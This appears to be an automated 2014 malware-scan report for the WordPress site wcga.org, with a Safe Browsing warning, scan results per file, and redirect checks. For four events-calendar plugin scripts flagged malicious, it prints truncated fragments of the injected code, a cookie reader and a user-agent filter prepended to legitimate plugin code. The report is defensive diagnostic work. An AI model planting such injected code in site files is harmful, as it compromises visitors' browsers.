Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wcga.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wcga.org/ | 200 OK Content-Length: 22878 Content-Type: text/html | clean |
http://wcga.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97518 Content-Type: application/javascript | clean |
http://wcga.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8316 Content-Type: application/javascript | clean |
http://wcga.org/wp-content/plugins/wp-photo-album-plus/wppa.min.js?ver=3.9.2 | 200 OK Content-Length: 58376 Content-Type: application/javascript | clean |
http://wcga.org/wp-content/plugins/the-events-calendar/resources/jquery.pjax.js?ver=3.9.2 | 200 OK Content-Length: 10561 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen Antivirus reports:
| ||
http://wcga.org/wp-content/plugins/the-events-calendar/resources/events.js?ver=3.9.2 | 200 OK Content-Length: 3295 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen timeout: 10000 }); }); $(document).pjax('a.tribe-pjax', { timeout: 10000, fragment: '#tribe-events-content', container: '#tribe-events-content' }) .bind('pjax:start', function() { $('.ajax-loading').show() }) .bind('pjax:end', function() { $('.ajax-loading').hide(); tribe_event_nudge() }); if ($.support.pjax) { $.pjax.defaults.scrollTo = false; } }); Antivirus reports:
| ||
http://wcga.org/wp-content/plugins/visual-form-builder/js/js_quicktags.js?ver=3.9.2 | 200 OK Content-Length: 10377 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201441 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://wcga.org/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 2046 Content-Type: application/javascript | clean |
http://stats.wordpress.com/e-201441.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://wcga.org/about/ | 200 OK Content-Length: 28003 Content-Type: text/html | clean |
http://wcga.org/wp-content/plugins/wp-photo-album-plus/wppa.min.js?ver=3.9.1 | 200 OK Content-Length: 58376 Content-Type: application/javascript | clean |
http://wcga.org/wp-content/plugins/the-events-calendar/resources/jquery.pjax.js?ver=3.9.1 | 200 OK Content-Length: 10561 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen Antivirus reports:
| ||
http://wcga.org/wp-content/plugins/the-events-calendar/resources/events.js?ver=3.9.1 | 200 OK Content-Length: 3295 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen timeout: 10000 }); }); $(document).pjax('a.tribe-pjax', { timeout: 10000, fragment: '#tribe-events-content', container: '#tribe-events-content' }) .bind('pjax:start', function() { $('.ajax-loading').show() }) .bind('pjax:end', function() { $('.ajax-loading').hide(); tribe_event_nudge() }); if ($.support.pjax) { $.pjax.defaults.scrollTo = false; } }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wcga.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 10:45:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/2iL7c>; rel=shortlink
X-Pingback: http://wcga.org/xmlrpc.php
GET / HTTP/1.1
Host: wcga.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 10:45:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/2iL7c>; rel=shortlink
X-Pingback: http://wcga.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: wcga.org
Referer: http://www.google.com/search?q=wcga.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wcga.org
Referer: http://www.google.com/search?q=wcga.org
Result:
The result is similar to the first query. There are no suspicious redirects found.